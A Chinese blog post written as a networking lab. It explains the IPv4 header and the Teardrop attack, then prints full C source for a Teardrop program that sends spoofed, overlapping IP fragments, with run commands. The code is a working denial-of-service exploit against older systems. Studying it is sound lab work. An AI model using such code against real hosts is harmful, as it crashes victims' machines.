产生虚假的用于欺骗的IP数据包程序实践——Teardrop

最新推荐文章于 2024-01-08 18:24:50 发布
最新推荐文章于 2024-01-08 18:24:50 发布
阅读量845 收藏 3
点赞数
分类专栏: 网络通信编程 文章标签: 网络通信 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/clyrjj/article/details/110602868
版权

文章目录

一、协议与原理

IP协议

IP协议是网络中最繁忙的协议。IP协议是一种best efforts协议,不保证可靠性,数据包可能重复、丢失;无连接协议,同一个连接中的多个报文被独立对待。IP协议主要定义了数据传送的基本单位;执行路由功能;主要规定了主机和路由器应该如何处理数据包;在什么情况下产生错误信息;以及什么情况下应该丢弃数据包。

IPV4的报头格式
在这里插入图片描述

下面详细描述ipv4报头中各个字段的含义:
·Version(版本): 该字段长度为4比特位。标识IP报头的版本和格式,ipv4数据包的该字段设置为:0100

·IHL( Internet报头长度):
该字段长度为4比特位。它标识报头的总长度,以32比特位为一个单位,在ipv4中头部被限制为最多15个32位字。有效报头的最小值为5。即0101

·Type of Service(服务类型):
该字段长度为8比特位。被分为俩个部分,前6位被称为区分服务字段—DS字段;后2位是显示拥塞通知字段—ECN字段,用于QS。 ·Total
Length(总长度): 该字段长度为16比特位。它标识数据报和数据包的总长度,单位为字节。所以ipv4的数据最大为65535。

·Identification(标识符):
该字段长度为16比特位。它标识分段所属的组,所属为同一组则标识符相同。在网络层中也可把流量区分开来,用于流量分片。

·Flags(标记位): 该字段长度为3比特位。它分为三分部分,保留位(reserved bit)为0;分片位(Don`t
fragent)当为1时标识未分片,0则标识被分片;更多位(more fragments)为0标识最后分段,为1标识更多分段。

·Fragment Offset(分段偏移): 该字段长度为13位比特位。用来重排序,它标识分段在当前数据包的位置,单位为字节。

·Time to Live(存活时间):
该字段长度为8比特位。在网络中标识数据包最大存活时间,用来防止路由环路,每经过一台路由器则TTL字段减去1,直到为0,此数据包直接被丢弃。其值最大为255,单位为s。然而现在路由器转发数据包都是用跳数来作为衡量单位。

·Protocol(协议): 该字段长度为8比特位。它用来标识上层协议(0—255),上图为6标识为TCP协议号。

·Header Checksum(报头校验和): 该字段长度为16比特位。
这个16位字段只对首部查错,不包括数据部分。在每一跳,路由器都要重新计算出的首部检验和并与此字段进行比对,如果不一致,此报文将会被丢弃。重新计算的必要性是因为每一跳的一些首部字段(如TTL、Flag、Offset等)都有可能发生变化,不检查数据部分是为了减少工作量。数据区的错误留待上层协议处理——(UDP)和(TCP)都有检验和字段。此处的检验计算方法不使用CRC。

·Source address(源地址): 该字段长度为32比特位。它标识发送者的ip地址。

·Destination address(目的地址): 该字段长度为32比特位。它标识接受者的ip地址。 ·options(ip选项):
该字段长度可变。该字段提供某些控制功能,但在大部分情况下不需要这些功能。里面包括机制有松散路由,严格路由,路由记录及时间戳。

·padding(填充): 通过options字段后面补充0来补齐32位比特位,padding的和位0或者是32的倍数。

Teardrop(泪滴)攻击原理

攻击者A给受害者B发送一些分片IP报文,并且故意将“13位分片偏移”字段设置成错误的值(既可与上一分片数据重叠,也可错开),B在组合这种含有重叠偏移的伪造分片报文时,会导致系统崩溃。

在这里插入图片描述

防御方法传送门——泪滴攻击(teardrop)及防御方法

二、实验

1、实验要求

伪造一个虚假地址的IP包,包的内容填入Fake News。发送此包。并用wireshark抓包进行验证。

2、实验在Ubuntu18.04环境下进行

3、
创建Teardrop.c文件,并写入如下代码

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <errno.h>

#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n)  (n)
#else  
/* OpenBSD 2.1, all Linux */
#define FIX(n)  htons(n)
#endif  /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF 0x2000  /* More IP fragment en route */
#define IPH 0x14    /* IP header size */
#define UDPH 0x8     /* UDP header size */
#define PADDING  0x1c    /* datagram frame padding for first packet */
#define MAGIC  0x3     /* Magic Fragment Constant (tm).  Should be 2 or 3 */
#define COUNT 0x1      /* Linux dies with 1, NT is more stalwart and can
                        * withstand maybe 5 or 10 sometimes...  Experiment.*/
                    

void usage(u_char *);
u_long name_resolve(u_char *);
void send_frags(int, u_long, u_long, u_short, u_short);


int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock;
    // 定义源地址和目的地址
    u_long src_ip = 0, dst_ip = 0;
    // 定义源端口和目的端口
    u_short src_prt = 0, dst_prt = 0;
    // 定义一个32位的IPv4地址
    struct in_addr addr;
    printf("teardrop route|daemon9\n\n");
    //创建原始套接字
    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    {
        fprintf(stderr, "raw socket");
        exit(1);
    }
    //设置套接字选项IP_HDRINCL
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL,
    (char *)&one, sizeof(one))< 0)
    {
        fprintf(stderr, "IP_HDRINCL");
        exit(1);
    }
    if (argc < 3)
        usage(argv[0]);
    // 设置源IP 和 目的IP
    if(!(src_ip=name_resolve(argv[1]))||!(dst_ip = name_resolve(argv[2])))
    {
        fprintf(stderr, "What the hell kind of IP address is that?\n");
        exit(1);
    }
    while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
    {
        switch (i)
        {
            case 's': // source port (should be emphemeral)
            src_prt = (u_short)atoi(optarg);
            break;
            case 't': // dest port (DNS, anyone?)
            dst_prt = (u_short)atoi(optarg);
            break;
            case 'n': // number to send
            count = atoi(optarg);
            break;
            default :
            usage(argv[0]);
            break; // NOTREACHED
        }
    }
    srandom((unsigned)(utimes("0",(time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count)
    count = COUNT;
    printf("Death on flaxen wings:\n");
    addr.s_addr = src_ip;
    printf("From: %15s.%5d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    printf(" To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
    printf(" Amt: %5d\n", count);
    printf("[\n ");
    for (i = 0; i < count; i++)
    {
        send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
        // printf("b00m ");
        usleep(500);
    }
    printf("]\n");
    return (0);
}


// 设置 IP 包的内容
void send_frags(int sock, u_long src_ip, u_long dst_ip,u_short src_prt,u_short dst_prt)
{
    u_char *packet = NULL, *p_ptr = NULL, *flag = NULL; // packet pointers
    u_char byte; // a byte
    // 套接字地址结构
    struct sockaddr_in sin; /* socket protocol structure */
    sin.sin_family = AF_INET;
    sin.sin_port = src_prt;
    sin.sin_addr.s_addr = dst_ip;
    packet = (u_char *)malloc(IPH + UDPH + PADDING);
    p_ptr = packet;
    flag = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
    // IP version and header length
    byte = 0x45;
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2; // IP TOS (skipped)
    // total length
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING);
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242); // IP id
    p_ptr += 2;
    //IP frag flags and offset
    *((u_short *)p_ptr) |= FIX(IP_MF);
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40; // IP TTL
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    // IP checksum filled in by kernel
    p_ptr += 4;
    // IP source address
    *((u_long *)p_ptr) = src_ip;
    p_ptr += 4;
    // IP destination address
    *((u_long *)p_ptr) = dst_ip;
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt); // UDP source port
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt); // UDP destination port
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(PADDING); // UDP total length
    p_ptr += 4;
    
    // 发送数据:Fake News
    *((u_short *)p_ptr) = 0x46;
    p_ptr++;
    *((u_short *)p_ptr) = 0x61;
    p_ptr++;
    *((u_short *)p_ptr) = 0x6B;
    p_ptr++;
    *((u_short *)p_ptr) = 0x65;
    p_ptr++;
    *((u_short *)p_ptr) = 0x20;
    p_ptr++;
    *((u_short *)p_ptr) = 0x4E;
    p_ptr++;
    *((u_short *)p_ptr) = 0x65;
    p_ptr++;
    *((u_short *)p_ptr) = 0x77;
    p_ptr++;
    *((u_short *)p_ptr) = 0x73;

    int i=1;
    while(i <= 56)
    {
	printf("%x\t",*flag);
	flag++;
        if(0 == i%8)
	    printf("\n");
        i++;
    }

    if (sendto(sock, packet, IPH + UDPH + PADDING, 0,
    (struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
    {
        fprintf(stderr, "\nsendto");
        free(packet);
        exit(1);
    }
    // IP total length is 2 bytes into the header
    p_ptr = &packet[2];
    *((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
    // IP offset is 6 bytes into the header
    p_ptr += 4;
    *((u_short *)p_ptr) = FIX(MAGIC);
    if (sendto(sock, packet, IPH+MAGIC+1, 0,
    (struct sockaddr *)&sin,sizeof(struct sockaddr)) == -1)
    {
        fprintf(stderr, "\nsendto");
        free(packet);
        exit(1);
    }
    free(packet);
}


// 获取主机信息
u_long name_resolve(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;
    if ((addr.s_addr = inet_addr(host_name)) == -1)
    {
        if (!(host_ent = gethostbyname(host_name))) return (0);
            bcopy(host_ent->h_addr, (char *)&addr.s_addr, host_ent->h_length);
    }
    return (addr.s_addr);
}


void usage(u_char *name)
{
    fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n",name);
    exit(0);
}

4、编译运行

gcc Teardrop.c -o Teardrop
sudo ./Teardrop 100.100.100.100 200.200.200.200

这边的ip就是随便填的,毕竟这是攻击程序,而且现在的操作系统早已对这个攻击方式免疫,如果要真的攻击那么可以试试在虚拟机上装老系统。
在这里插入图片描述
5、wireshark抓包验证
在这里插入图片描述

三、小结与参考链接

学习Teardrop 这个程序当然不是为了攻击,而是可以了解一个 IP 的形成过程。这也是我第一次网络安全方面有所接触,感觉这方面是门大学问。
参考链接:
IPv4报头格式分析
泪滴攻击(teardrop)及防御方法
IP协议安全:泪滴攻击与碎片攻击

clyrjj
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
原始套接字编程:Teardrop伪造IP
weixin_45189408的博客
12-07 511
目录原始套接字概述功能含义原始套接字和标准套接字的区别Teardrop伪造IPTeardrop 攻击原理Teardrop 防御方法编写teardrop代码 原始套接字 概述 raw socket,即原始套接字,可以接收本机网卡上的数据帧或者数据包,对于监听网络的流量和分析是很有作用的,一共可以有4种方式创建这种socket。 1.socket(PF_INET, SOCK_RAW, IPPROTO_TCP|IPPROTO_UDP|IPPROTO_ICMP)发送接收ip数据包 2.socket(PF_PAC
【HCIP-交换基础】
kouacbb的博客
08-09 661
交换基础
HCIP的基础知识点(详细)
热门推荐
weixin_64747212的博客
09-24 2万+
hcip的笔记
【无标题】HCIP第二天笔记总结
weixin_57549548的博客
01-04 1880
[r1]arp static 192.168.2.1 00e0-fcc3-80dc ---- 手工绑定ARP关系 静态路由的拓展配置 1,负载均衡 --- 当路由器访问同一个目标具有多条开销相似的路径时, 可以让流量拆分后延多条路径同时传输,可以达到叠加带宽的效果。 [r2]ip route-static 192.168.0.0 22 12.0.0.1 2,手工汇总 --- 当路由器可以访问多个连续子网时,若均通过相同的下 一跳,可以将这些网段进行汇总计算,之后仅编辑到达汇总网段的静态路 由即可,以达到减少
HCIP总结
m0_59952621的博客
09-30 707
HCIP总结
C语言解析IP数据包程序
06-04
标题 "C语言解析IP数据包程序" 涉及到的是使用C语言编写的一个程序,其主要功能是解析网络中的IP数据包。在计算机网络中,IP数据包是传输层协议IP(Internet Protocol)用于在网络间传递数据的基本单元。这个程序...
解析IP数据包程序的设计与实现
06-06
《解析IP数据包程序的设计与实现》是一篇关于网络协议编程的课程设计报告,主要针对C#编程语言,旨在捕获并解析网络中的IP数据包。这篇报告详细介绍了设计和实现这样一个程序的过程,以及需要考虑的关键要素。 首先...
计算机网络:实验2 IP数据包捕获程序设计.docx
11-26
【计算机网络:实验2 IP数据包捕获程序设计】 在这个实验中,主要目标是设计一个能够捕获并分析IP数据包程序。实验的核心在于理解和应用IP协议的原理,同时提高编程技能。以下是对实验涉及知识点的详细说明: 1....
C++解析IP数据包程序
06-20
标题中的"C++解析IP数据包程序"涉及到的是网络编程领域的一个具体应用,主要利用C++语言来解析网络传输中的IP数据包IP数据包是Internet协议(IP)在网络层传输数据的基本单位,它包含了源和目标IP地址、数据包的...
ISIS基本概念与配置(HCIP完整版)
最新发布
weixin_72194028的博客
01-08 1103
ISIS基本概念与配置(HCIP完整版)
HCIP(11)
weixin_52812558的博客
01-18 432
在多点的重发布中,由于重发布技术的种子度量值问题,将必然导致选路不佳;只能依赖路由策略来人为干涉选路。 控制层流量 -- 路由协议发送路由信息是产生的流量。 数据层流量 -- 设备访问目标地址时产生的流量。 路由策略:在控制层流量转发的过程中,截取流量,之后,修改流量 中的参数或直接不转发,最终影响路由器路由表的生成,以达到干涉选路的目的。 1.抓取流量(控制层流量) 1.通过ACL列表进行抓取 --- 本身用于限制数据层流量的进出,也可以用于抓取控制层流量,但由于通配符的设计,导致其无
tcpip协议_工控CIP/EtherNet/IP协议仿真环境搭建
weixin_39926749的博客
12-10 3290
一、TCPIP协议简介通用工业协议(Common Industrial Protocol,CIP)是一种应用在工业自动化的通信协定,由开放DeviceNet厂商协会(Open DeviceNet Vendors Association,ODVA)所维护。以前的名称为控制和信息协议(Control and Information Protocol,也即CIP)。CIP主要由对象建模、报文协...
HCIP(华为高级网络安全工程师)(实验六)(BGP基础实验)
m0_63069714的博客
02-08 1390
实验要求 1、所有路由器发布到自己的换回网段 2、发布方法需要使用到network和重发布两种(重发布通过路由策略仅发布环回网段) 3、在R1上创建两条可汇总的网段进行手工聚合 4、所有发布的网段之间可以互相通讯 实验思路 ...
BGP基础配置实验(hcip基础)
m0_48684060的博客
10-13 174
作业:建立BGP对等关系,r1和r5个发布一条路由,保证网段可以互相通信。可在r1上看到已下发的路由。可以在r5上看到已下发的路由。将下一跳属性修改为自身。将下一跳的属性修改为自身。将r5的环回下发到r1。
HCIP第一次实验
wyp20011020的博客
01-12 2287
实验图像 1.配置基础地址 仅展示R1地址配置 其余地址配置与一相同 2.测试 3.缺省路由 R1----R5 仅展示R1缺省路由配置其余同一 测试 4.最佳路由 5.备份路由 6.NAT 测试全网可通 7.防环接口路由 8.telnet ...
cip协议服务器,CIP 传输协议
weixin_26840895的博客
07-30 1852
CIP 传输协议摘要本文主要说明用于传输CIP请求/响应,索引对象,实现它们在TCP,邮件和HTTP上传输的三个协议。相关的资料请在其它资料中查询。1. 协议本节说明用于传输CIP索引对象和维护网结构。本文主要定义定义消息格式,传输机制。CIP协议的设计思想是一种块设计思想。它不依赖于许多于协议定义工具,或文本编码方式,而是利用现有的协议技术进行设计。这样可以使设计和实现简化。这也是利用现有的In...
Wireshark数据包分析——Teardrop泪滴攻击
PP_zi的博客
08-22 3780
分析Teardrop数据包
【网络】网络基础知识总结(包括TCP/IP协议、ARP、UDP等)
chenrui310的博客
09-29 2608
【网络】网络基础知识总结(包括TCP/IP协议、ARP、UDP等) 说到网络相关知识,首先先说说计算机网络体系结构中两种最为重要的参考模型,OSI参考模型和TCP/IP参考模型。 1、OSI参考模型: OSI(Open System Interconnect),即开放式系统互联。一般都称为OSI参考模型,是ISO(国际标准化组织)组织在1985年研究的网络互联模型。该...
1.1、云计算HCIP服务器基础知识
weixin_43666279的博客
07-23 2615
目标:了解IT基础设施与数据中心 了解服务器的基础知识 了解BIOS、BMC、PXE、操作系统、文件系统 一、计算机构成 计算机系统由软件和硬件组成,软件包括系统软件和应用软件;硬件包括CPU,内存,硬盘,IO设备(对应的计算,存储,内部总线) 计算机不能作为服务器的原因:兼容性差,性能低,可靠性低(没有双电源、保电机制、RAID等) 内部总线:负责整个计算机内部硬件公共通信线路,硬件之间,硬件和软件之间,软件和软件之间。 二、传统计算机内部结构 北桥决定了CPU、内存的类型 三、IT系统
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值